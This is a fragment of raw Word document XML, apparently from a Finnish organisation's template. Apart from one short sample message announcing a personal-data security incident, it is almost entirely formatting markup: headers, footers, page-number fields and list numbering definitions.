        <w:t>"We've identified a potential security incident involving unauthorized access to personal data. The situation is under urgent review, and we are implementing all necessary measures to assess and mitigate any impact. You will receive a detailed briefing within two hours or sooner, as significant developments occur."</w:t>
      </w:r>
      <w:r w:rsidRPr="006016C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00870D5F" w:rsidRPr="006016C4" w:rsidSect="00964D12">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A512A" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12" w:rsidP="00520772">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41787B78" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12"/>
    <w:p w14:paraId="462581CF" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="024000DB" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12" w:rsidP="00520772">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D92AB" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12"/>
    <w:p w14:paraId="42A0A468" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12"/>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="726139D8" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D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A949D" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C6" w:rsidP="00383B12">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:firstLine="1304"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EDBF707" wp14:editId="17A093D3">
          <wp:extent cx="3157855" cy="40259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57855" cy="402590"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>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55868" w14:textId="77777777" w:rsidR="005531C6" w:rsidRPr="00701321" w:rsidRDefault="005531C6" w:rsidP="007013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4FD42" w14:textId="77777777" w:rsidR="005531C6" w:rsidRPr="00701321" w:rsidRDefault="005531C6" w:rsidP="00701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E9BA7" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12" w:rsidP="00520772">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D63BE0" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12"/>
    <w:p w14:paraId="12C3AA90" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14CF819A" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12" w:rsidP="00520772">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABAE02" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12"/>
    <w:p w14:paraId="103F845B" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D12"/>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="002DAB69" w14:textId="77777777" w:rsidR="00964D12" w:rsidRDefault="00964D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3B627" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C6" w:rsidP="00520772">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:left="1276"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="fi-FI"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4549B1D4" wp14:editId="3737E304">
          <wp:extent cx="2088000" cy="1044111"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="7" name="Kuva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uva 1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2088000" cy="1044111"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="fi-FI"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="760CD17D" wp14:editId="64CD9BB9">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>1270</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="342900" cy="9258300"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="3" name="Suorakulmio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D004C"/>
                      </a:solidFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>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FE2361A" id="Suorakulmio 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:.1pt;width:27pt;height:72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" fillcolor="#0d004c" stroked="f"/>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A9F9" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="00553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0765798"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="27841169" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C6">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="109CA251" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C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4158C" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="00000000" w:rsidP="00A764D6">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1375190810"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:r w:rsidR="005531C6">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005531C6">
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidR="005531C6">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005531C6">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="005531C6">
          <w:fldChar w:fldCharType="end"/>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38FAA" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C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561557"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="511778D6" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C6">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="0C838ADA" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C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54922" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C6" w:rsidP="00A764D6">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:sdt>
    <w:sdtPr>
      <w:id w:val="2077011834"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="3AC38BE0" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C6" w:rsidP="00A764D6">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="7AD9D7C7" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C6"/>
  <w:p w14:paraId="1237F178" w14:textId="77777777" w:rsidR="005531C6" w:rsidRDefault="005531C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hybridMultilevel"/>
    <w:tmpl w:val="F384D862"/>
    <w:lvl w:ilvl="0" w:tplc="CDDE3AC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="ListNumber4"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1209"/>
        </w:tabs>
        <w:ind w:left="1209" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BB1EDD20">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A7107B4E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C6FC4584">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6482470E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5948AD16">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9E22FE82">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5B869EC4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4B8CD150">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A1A06A0"/>
    <w:lvl w:ilvl="0" w:tplc="87B83FC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet4"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1209"/>
        </w:tabs>
        <w:ind w:left="1209" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="37AAC574">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A4C6B314">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BCFC826A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="90BE5926">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="92F8DFC6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5A48FEA4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5ED6A95E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="06C64FC0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B224620"/>
    <w:lvl w:ilvl="0" w:tplc="DEF01E98">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1F86A216">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8CE49EFC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D9A40098">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="232A8422">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9D82F900">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3208D784">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7B5E5358">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A6825CB8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="037831E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4A22C5E"/>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7A85EA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19427A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098D2379"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="287A3270"/>
    <w:lvl w:ilvl="0" w:tplc="CCC67DE6">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1CF10F0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25C2EBF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AFA7DBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A1A547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31D57979"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0B4671E"/>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9"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33852FFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8AA2B7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34C952AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18B6652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415A5D76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63CCDF6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420624A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B82022C"/>
    <w:lvl w:ilvl="0" w:tplc="4FEA17AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040B0019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1140" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="040B001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1860" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="040B000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2580" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="040B0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3300" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="040B001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4020" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="040B000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4740" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="040B0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5460" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040B001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6180" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="481F0C82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F98B8F8"/>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4CBE69CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE92973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4DB973B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64C202A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59F261B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5650AC68"/>
    <w:lvl w:ilvl="0" w:tplc="040B0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040B0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="040B0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="040B0001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="040B0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="040B0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="040B0001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="040B0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040B0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="614A2AE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="966AFF36"/>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629C526E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF283AEE"/>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20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="649A3F7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8062C9C0"/>
    <w:lvl w:ilvl="0" w:tplc="040B0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3660" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040B0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4380" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="040B0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5100" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="040B0001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5820" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="040B0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6540" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="040B0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7260" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="040B0001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7980" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="040B0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040B0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9420" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="66882F99"/>
